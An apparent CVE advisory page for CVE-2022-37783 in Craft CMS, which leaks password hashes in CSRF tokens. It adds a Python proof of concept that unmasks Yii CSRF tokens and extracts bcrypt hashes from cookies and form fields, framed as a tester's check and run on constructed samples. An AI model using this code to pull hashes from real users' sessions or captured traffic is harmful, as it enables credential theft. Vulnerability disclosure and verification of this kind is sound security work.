Exploit Report

Computer Security And Bug Information

CVE-2022-37783

CVE: CVE-2022-37783
CVE Ordinal Value: 243796
Published Date: 2022-12-05T21:15Z
Modified Date: 2022-12-07T04:52Z
CWE Type: CWE-311 (Missing Encryption of Sensitive Data)
CVSS 3.x: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (7.5 High)
Description: All Craft CMS versions between 3.0.0 and 3.7.32 disclose the password hashes of users who authenticate with their e-mail address or username in anti-CSRF tokens. Craft CMS uses a cookie named CRAFT_CSRF_TOKEN and an HTML hidden field named CRAFT_CSRF_TOKEN to prevent Cross-Site Request Forgery attacks. The CRAFT_CSRF_TOKEN cookie discloses the password hash without any encoding, whereas the corresponding HTML hidden field discloses it in masked form, which can be decoded using public functions of the Yii framework.
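The masking the description refers to is Yii's CSRF token masking: the raw token is stored in the cookie, and each rendered form gets a copy produced by Security::maskToken(), which draws a random mask of the token's length, XORs it with the token and base64url-encodes mask and result together. Because the mask travels with the data, Security::unmaskToken() needs no key, so anyone holding the hidden-field value recovers exactly what the cookie holds. The Python below is an added example, not code from this page, from Craft CMS or from Yii: it ports those two functions and runs the check a tester would run on one response, unmasking the hidden field, confirming it matches the cookie, and searching both for a bcrypt-style hash. The "<nonce>|<hash>" layout of the constructed sample token and the bcrypt regex are assumptions made for the demonstration, not Craft's actual token format.

```python
import base64
import binascii
import os
import re
from typing import Dict, List, Optional

# Assumption: the stored hashes are bcrypt as produced by PHP's password_hash()
# (Yii's generatePasswordHash): "$2y$<cost>$" followed by 53 bcrypt-alphabet chars.
BCRYPT_RE = re.compile(r"\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}")


def mask_token(token: bytes, mask: Optional[bytes] = None) -> str:
    """Port of Yii 2 Security::maskToken(): base64url(mask || (mask XOR token)).

    Yii draws a fresh random mask per call; a fixed mask can be passed here only
    so that the demonstration is reproducible."""
    if mask is None:
        mask = os.urandom(len(token))
    if len(mask) != len(token):
        raise ValueError("mask must be exactly as long as the token")
    xored = bytes(m ^ t for m, t in zip(mask, token))
    return base64.urlsafe_b64encode(mask + xored).decode("ascii")


def unmask_token(masked: str) -> bytes:
    """Port of Yii 2 Security::unmaskToken(), the inverse of mask_token().

    No secret is involved: the mask is the first half of the decoded value.
    Masking randomises the token per response (a BREACH mitigation); it is not
    encryption, which is why a hash inside the token is still exposed."""
    try:
        decoded = base64.urlsafe_b64decode(masked)
    except binascii.Error:
        return b""
    if len(decoded) % 2:  # Yii returns '' when the payload has odd length
        return b""
    half = len(decoded) // 2
    mask, xored = decoded[:half], decoded[half:]
    return bytes(m ^ x for m, x in zip(mask, xored))


def find_password_hashes(blob: str) -> List[str]:
    """Return every bcrypt-looking substring found in blob."""
    return BCRYPT_RE.findall(blob)


def audit_csrf_pair(cookie_value: str, hidden_field_value: str) -> Dict[str, object]:
    """The check the advisory describes, on one captured response: unmask the
    hidden field, confirm it is the same token the cookie carries, and look for
    a password hash in both the raw and the unmasked form."""
    unmasked = unmask_token(hidden_field_value).decode("utf-8", "replace")
    return {
        "field_unmasks_to_cookie": unmasked == cookie_value,
        "hashes_in_cookie": find_password_hashes(cookie_value),
        "hashes_in_hidden_field": find_password_hashes(unmasked),
    }


# Constructed sample, not captured from any site. The "<nonce>|<hash>" layout is a
# hypothetical illustration of the advisory, and the hash string is made up.
SAMPLE_HASH = "$2y$13$" + "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0"
SAMPLE_COOKIE = "5f3a9c0b1d2e|" + SAMPLE_HASH
FIXED_MASK = bytes(range(len(SAMPLE_COOKIE)))  # deterministic mask for the demo only
SAMPLE_HIDDEN_FIELD = mask_token(SAMPLE_COOKIE.encode(), FIXED_MASK)

if __name__ == "__main__":
    print(audit_csrf_pair(SAMPLE_COOKIE, SAMPLE_HIDDEN_FIELD))
```

On a real target, pass audit_csrf_pair() the CRAFT_CSRF_TOKEN value from the Set-Cookie header and the hidden-field value from a form rendered for an authenticated user; on an affected version both hash lists contain the user's bcrypt hash, and on a fixed version both are empty. Since the token is embedded in every page and cookie of a logged-in session, anything that captures them (proxy or application logs, browser caches, an XSS foothold) captures the hash as well.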
References
Reference URL: https://at-trustit.tuv.at/tuev-trust-it-cves/cve-disclosure-of-password-hashes/
Reference Description: MISC https://at-trustit.tuv.at/tuev-trust-it-cves/cve-disclosure-of-password-hashes/
Tags: Exploit, Third Party Advisory
Sources: NIST, MITRE
